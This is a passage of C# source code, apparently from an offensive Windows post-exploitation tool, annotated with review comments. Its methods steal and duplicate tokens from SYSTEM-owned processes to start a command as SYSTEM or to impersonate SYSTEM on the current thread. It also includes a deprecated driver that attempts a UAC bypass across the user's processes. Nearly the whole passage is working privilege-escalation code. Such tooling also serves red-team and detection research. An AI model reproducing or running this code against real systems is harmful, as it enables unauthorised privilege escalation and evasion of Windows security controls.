////////////////////////////////////////////////////////////////////////////////
        // Creates a new process as SYSTEM
        ////////////////////////////////////////////////////////////////////////////////
        // Walks every process that EnumerateUserProcesses reports for the local
        // SYSTEM account and, for the first one whose token can be opened and
        // duplicated at SecurityImpersonation level, launches newProcess with it.
        //
        // newProcess: command line handed to StartProcessAsUser (that helper is
        //             defined outside this view).
        // Returns true as soon as one launch succeeds, false when no candidate
        // process could be used. Translate() can throw IdentityNotMappedException
        // if the well-known SID cannot be mapped to an account name.
        public bool GetSystem(string newProcess)
        {
            SecurityIdentifier securityIdentifier = new SecurityIdentifier(WellKnownSidType.LocalSystemSid, null);
            // The resolved account name (which may be localized) is what
            // EnumerateUserProcesses is asked to match on below.
            NTAccount          systemAccount      = (NTAccount)securityIdentifier.Translate(typeof(NTAccount));

            Console.WriteLine("[*] Searching for {0}", systemAccount.ToString());
            // 'processes' is a field declared outside this view; it is overwritten here.
            processes = UserSessions.EnumerateUserProcesses(false, systemAccount.ToString());

            foreach (uint process in processes.Keys)
            {
                // PIDs are enumerated as uint; the wrapper takes int, hence the cast.
                if (OpenProcessToken((int)process))
                {
                    Console.WriteLine(" [+] Opened {0}", process);
                    // The parameterless SetWorkingToken* calls appear to select the
                    // token that the following DuplicateToken / StartProcessAsUser
                    // operate on, so this call order is load-bearing.
                    SetWorkingTokenToRemote();
                    if (DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation))
                    {
                        SetWorkingTokenToNewToken();
                        if (StartProcessAsUser(newProcess))
                        {
                            return(true);
                        }
                    }
                    // NOTE(review): a token opened here whose duplication or launch
                    // fails is not released in this method — confirm the owning
                    // class closes it.
                }
            }

            // Reached when no candidate succeeded. This also runs when the loop body
            // never executed (nothing enumerated), so the Win32 error reported here
            // may be unrelated to this method.
            Misc.GetWin32Error("GetSystem");
            return(false);
        }
        ////////////////////////////////////////////////////////////////////////////////
        // Use Native APIs to find processes that a user is running
        ////////////////////////////////////////////////////////////////////////////////
        // Prints a two-column table (PID, image name) of the processes that
        // EnumerateUserProcesses reports for the user named in the "username"
        // argument. When no username was supplied a notice is printed and the
        // method returns without enumerating anything.
        private static void _FindUserProcesses(CommandLineParsing cLP)
        {
            string user;
            bool haveUser = cLP.GetData("username", out user);

            if (!haveUser)
            {
                Console.WriteLine("[-] Username not specified");
                return;
            }

            // NOTE(review): the first argument is false here and true in the UAC
            // path on this page; its meaning is defined by EnumerateUserProcesses,
            // which is outside this view — confirm before relying on it.
            Dictionary<uint, string> owned = UserSessions.EnumerateUserProcesses(false, user);

            const string rowFormat = "{0,-30}{1,-30}";
            Console.WriteLine(rowFormat, "Process ID", "Process Name");
            Console.WriteLine(rowFormat, "----------", "------------");

            // Enumerating the dictionary directly yields the same order as
            // walking Keys and indexing, without the second lookup per row.
            foreach (KeyValuePair<uint, string> entry in owned)
            {
                Console.WriteLine(rowFormat, entry.Key, entry.Value);
            }
        }
        ////////////////////////////////////////////////////////////////////////////////
        // Elevates current process to SYSTEM
        ////////////////////////////////////////////////////////////////////////////////
        // Parameterless variant: instead of starting a new process, the first
        // SYSTEM-owned process whose token can be opened is used to impersonate
        // on the current thread via ImpersonateUser().
        //
        // Returns true on the first successful impersonation, false otherwise.
        // Translate() can throw IdentityNotMappedException if the well-known SID
        // cannot be mapped to an account name.
        public bool GetSystem()
        {
            SecurityIdentifier securityIdentifier = new SecurityIdentifier(WellKnownSidType.LocalSystemSid, null);
            // The resolved account name (which may be localized) is what
            // EnumerateUserProcesses is asked to match on below.
            NTAccount          systemAccount      = (NTAccount)securityIdentifier.Translate(typeof(NTAccount));

            Console.WriteLine("[*] Searching for {0}", systemAccount.ToString());
            // 'processes' is a field declared outside this view; it is overwritten here.
            processes = UserSessions.EnumerateUserProcesses(false, systemAccount.ToString());

            foreach (uint process in processes.Keys)
            {
                // PIDs are enumerated as uint; the wrapper takes int, hence the cast.
                if (OpenProcessToken((int)process))
                {
                    Console.WriteLine(" [+] Opened {0}", process);
                    // SetWorkingTokenToRemote appears to select the token that
                    // ImpersonateUser acts on; keep the two calls adjacent.
                    SetWorkingTokenToRemote();
                    if (ImpersonateUser())
                    {
                        return(true);
                    }
                    // NOTE(review): a token opened here whose impersonation fails
                    // is not released in this method — confirm the owning class
                    // closes it.
                }
            }
            // Unlike the overload that takes a command line, this path reports
            // no Win32 error on failure, so the caller only sees 'false'.
            return(false);
        }
 ////////////////////////////////////////////////////////////////////////////////
 // UAC Token Magic - Deprecated
 ////////////////////////////////////////////////////////////////////////////////
 // Deprecated driver for RestrictedToken.BypassUAC. With cLP.Remote set, a single
 // attempt is made against cLP.ProcessID; otherwise every process that
 // EnumerateUserProcesses reports for the current identity is tried in turn.
 //
 // hToken: raw token handle that each RestrictedToken instance wraps; this
 //         method never closes it itself (see the ownership note below).
 // Returns nothing and does not report success; apart from the notice and the
 // per-PID line printed here, any outcome reporting lives in RestrictedToken.
 private static void _BypassUAC(CommandLineParsing cLP, IntPtr hToken)
 {
     Console.WriteLine("[*] Notice: This no longer working on versions of Windows 10 > 1703");
     if (cLP.Remote)
     {
         using (RestrictedToken rt = new RestrictedToken(hToken))
         {
             rt.BypassUAC(cLP.ProcessID, cLP.Command);
         }
     }
     else
     {
         string name = WindowsIdentity.GetCurrent().Name;
         // NOTE(review): the first argument is true here and false in the other
         // callers on this page; its meaning is defined by EnumerateUserProcesses,
         // which is outside this view — confirm.
         Dictionary <uint, string> uacUsers = UserSessions.EnumerateUserProcesses(true, name);
         foreach (uint pid in uacUsers.Keys)
         {
             Console.WriteLine("\n[*] Attempting Bypass with PID {0} ({1})", pid, uacUsers[pid]);
             // A fresh RestrictedToken wraps the same hToken on every iteration and
             // is disposed at the end of it.
             // NOTE(review): if RestrictedToken.Dispose closes hToken, every
             // iteration after the first runs against a closed handle — confirm
             // which side owns hToken.
             using (RestrictedToken rt = new RestrictedToken(hToken))
             {
                 rt.BypassUAC((int)pid, cLP.Command);
             }
         }
     }
 }